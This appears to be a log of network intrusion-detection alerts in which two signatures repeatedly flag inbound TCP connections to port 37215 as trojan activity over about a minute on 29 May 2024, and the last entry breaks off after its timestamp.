                Timestamp:05/29/24-15:15:43.280648
                SID:2829579
                Source Port:53206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730736
                SID:2829579
                Source Port:39362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374721
                SID:2835222
                Source Port:37034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854480
                SID:2835222
                Source Port:40546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780775
                SID:2829579
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662627
                SID:2829579
                Source Port:45282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032597
                SID:2829579
                Source Port:53172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717130
                SID:2835222
                Source Port:42018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873642
                SID:2829579
                Source Port:40730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812901
                SID:2829579
                Source Port:36146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281454
                SID:2835222
                Source Port:37502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229871
                SID:2829579
                Source Port:57456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558307
                SID:2829579
                Source Port:45802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222075
                SID:2835222
                Source Port:33614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778021
                SID:2829579
                Source Port:48554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140967
                SID:2829579
                Source Port:55984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830644
                SID:2829579
                Source Port:43214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897223
                SID:2835222
                Source Port:48782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418554
                SID:2829579
                Source Port:58062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216831
                SID:2829579
                Source Port:33726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796639
                SID:2835222
                Source Port:52826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732253
                SID:2829579
                Source Port:50024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212159
                SID:2835222
                Source Port:46642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975925
                SID:2829579
                Source Port:37250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047684
                SID:2835222
                Source Port:45854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900264
                SID:2835222
                Source Port:59878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070216
                SID:2835222
                Source Port:57264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231467
                SID:2835222
                Source Port:60032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442728
                SID:2829579
                Source Port:56070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128792
                SID:2829579
                Source Port:33002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834697
                SID:2835222
                Source Port:57168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.230413
                SID:2829579
                Source Port:40494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322126
                SID:2835222
                Source Port:60632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472223
                SID:2835222
                Source Port:36810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362522
                SID:2835222
                Source Port:37900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032550
                SID:2829579
                Source Port:40938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463604
                SID:2835222
                Source Port:43744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226876
                SID:2835222
                Source Port:52194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160113
                SID:2835222
                Source Port:51630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899070
                SID:2829579
                Source Port:59576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227020
                SID:2829579
                Source Port:55436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844517
                SID:2835222
                Source Port:45912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433859
                SID:2829579
                Source Port:45046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783729
                SID:2835222
                Source Port:37088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885800
                SID:2835222
                Source Port:47826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420437
                SID:2829579
                Source Port:33862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967016
                SID:2829579
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881801
                SID:2835222
                Source Port:40100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782635
                SID:2835222
                Source Port:49994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681806
                SID:2835222
                Source Port:46784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965109
                SID:2835222
                Source Port:52002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793612
                SID:2835222
                Source Port:55200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963158
                SID:2829579
                Source Port:45644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227781
                SID:2835222
                Source Port:39662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967706
                SID:2829579
                Source Port:33618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510922
                SID:2829579
                Source Port:46400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281756
                SID:2829579
                Source Port:46374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970504
                SID:2829579
                Source Port:54210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684525
                SID:2835222
                Source Port:33712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.115472
                SID:2829579
                Source Port:42796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582848
                SID:2829579
                Source Port:35744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925726
                SID:2829579
                Source Port:37122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557329
                SID:2835222
                Source Port:40442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273932
                SID:2829579
                Source Port:49620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510223
                SID:2829579
                Source Port:56070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559114
                SID:2829579
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845182
                SID:2835222
                Source Port:39826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510123
                SID:2829579
                Source Port:38282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184652
                SID:2829579
                Source Port:39716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418862
                SID:2829579
                Source Port:57228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227840
                SID:2829579
                Source Port:52434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499856
                SID:2829579
                Source Port:41592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331206
                SID:2829579
                Source Port:40572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040573
                SID:2835222
                Source Port:40532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236130
                SID:2835222
                Source Port:51122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077079
                SID:2835222
                Source Port:47732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899150
                SID:2835222
                Source Port:54444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865946
                SID:2829579
                Source Port:51366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417637
                SID:2835222
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583723
                SID:2829579
                Source Port:54656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831154
                SID:2829579
                Source Port:50648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931322
                SID:2829579
                Source Port:43614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919598
                SID:2835222
                Source Port:57982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955335
                SID:2829579
                Source Port:48788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225995
                SID:2829579
                Source Port:35700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944978
                SID:2829579
                Source Port:42400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524415
                SID:2829579
                Source Port:57382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612552
                SID:2835222
                Source Port:34814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559474
                SID:2829579
                Source Port:44498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807204
                SID:2829579
                Source Port:53234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277653
                SID:2829579
                Source Port:49534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.393477
                SID:2835222
                Source Port:53864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2829579
                Source Port:43878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959557
                SID:2829579
                Source Port:42046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163338
                SID:2829579
                Source Port:51518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026558
                SID:2829579
                Source Port:52274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992628
                SID:2835222
                Source Port:54342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597153
                SID:2829579
                Source Port:46396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507410
                SID:2835222
                Source Port:58960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221462
                SID:2829579
                Source Port:54140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091244
                SID:2829579
                Source Port:42016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878295
                SID:2829579
                Source Port:50144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992939
                SID:2829579
                Source Port:57940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066689
                SID:2829579
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584316
                SID:2829579
                Source Port:47084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779544
                SID:2829579
                Source Port:35592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945635
                SID:2835222
                Source Port:35156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863505
                SID:2835222
                Source Port:47418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463402
                SID:2829579
                Source Port:38374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956325
                SID:2835222
                Source Port:59358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726089
                SID:2829579
                Source Port:58800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870456
                SID:2835222
                Source Port:32928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228022
                SID:2829579
                Source Port:50674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816564
                SID:2829579
                Source Port:53368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013743
                SID:2835222
                Source Port:37034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561905
                SID:2829579
                Source Port:48668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141761
                SID:2829579
                Source Port:33914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598160
                SID:2829579
                Source Port:54892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509301
                SID:2829579
                Source Port:40616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521334
                SID:2829579
                Source Port:41370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324295
                SID:2829579
                Source Port:44068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942994
                SID:2829579
                Source Port:55872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239604
                SID:2829579
                Source Port:48408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501294
                SID:2835222
                Source Port:39422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915142
                SID:2835222
                Source Port:49736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161225
                SID:2835222
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.627019
                SID:2829579
                Source Port:42446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532611
                SID:2835222
                Source Port:51980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982943
                SID:2835222
                Source Port:54610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286743
                SID:2835222
                Source Port:35158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913001
                SID:2829579
                Source Port:42512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135838
                SID:2835222
                Source Port:43444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765023
                SID:2829579
                Source Port:50498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668714
                SID:2835222
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714087
                SID:2835222
                Source Port:55634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464517
                SID:2835222
                Source Port:59108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.101197
                SID:2835222
                Source Port:58624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233261
                SID:2835222
                Source Port:58956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804811
                SID:2829579
                Source Port:42656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.041756
                SID:2835222
                Source Port:32828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784743
                SID:2829579
                Source Port:47290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668678
                SID:2829579
                Source Port:50800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743622
                SID:2835222
                Source Port:49952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132728
                SID:2835222
                Source Port:59858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.392506
                SID:2829579
                Source Port:37320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072467
                SID:2829579
                Source Port:43094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438901
                SID:2835222
                Source Port:48570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212172
                SID:2829579
                Source Port:59794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.392612
                SID:2829579
                Source Port:59942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.617089
                SID:2829579
                Source Port:45474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989215
                SID:2829579
                Source Port:54482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503428
                SID:2835222
                Source Port:35222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975031
                SID:2835222
                Source Port:60758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472950
                SID:2829579
                Source Port:38988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171870
                SID:2835222
                Source Port:56546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177392
                SID:2829579
                Source Port:38992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782161
                SID:2829579
                Source Port:48968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856800
                SID:2829579
                Source Port:43422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881743
                SID:2835222
                Source Port:50766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280443
                SID:2835222
                Source Port:45058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110633
                SID:2835222
                Source Port:38870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688941
                SID:2829579
                Source Port:55220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841357
                SID:2829579
                Source Port:38516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335725
                SID:2829579
                Source Port:58394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559354
                SID:2835222
                Source Port:58746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703396
                SID:2835222
                Source Port:49648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901079
                SID:2829579
                Source Port:40976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867628
                SID:2835222
                Source Port:44490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979458
                SID:2829579
                Source Port:47798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029592
                SID:2835222
                Source Port:60874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178140
                SID:2829579
                Source Port:45786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655895
                SID:2835222
                Source Port:48398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684983
                SID:2829579
                Source Port:53542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224392
                SID:2829579
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767006
                SID:2835222
                Source Port:35404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175410
                SID:2835222
                Source Port:51598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884091
                SID:2829579
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968586
                SID:2829579
                Source Port:39048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155641
                SID:2835222
                Source Port:42718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663678
                SID:2835222
                Source Port:46556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870505
                SID:2829579
                Source Port:45780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559095
                SID:2835222
                Source Port:33328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663495
                SID:2835222
                Source Port:40546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097542
                SID:2829579
                Source Port:57024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.649979
                SID:2835222
                Source Port:47396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450870
                SID:2829579
                Source Port:43888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573278
                SID:2835222
                Source Port:36700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559215
                SID:2829579
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436390
                SID:2829579
                Source Port:50288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110778
                SID:2835222
                Source Port:53686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859240
                SID:2829579
                Source Port:60266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.651536
                SID:2829579
                Source Port:52088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874663
                SID:2835222
                Source Port:37048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531361
                SID:2835222
                Source Port:55048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273658
                SID:2829579
                Source Port:44752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282414
                SID:2829579
                Source Port:34202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227106
                SID:2829579
                Source Port:48374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583877
